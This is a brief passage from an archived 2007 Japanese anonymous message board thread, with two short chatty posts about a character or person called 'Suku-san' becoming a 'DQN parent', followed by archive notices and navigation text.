140 :名無しかわいいよ名無し:2007/12/04(火) 15:57:44 ID:uzRmZdNW
スクさんDQN親に昇格

141 :名無しかわいいよ名無し:2007/12/04(火) 16:02:37 ID:sa3rlVIA
伽尾亜たん

31 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)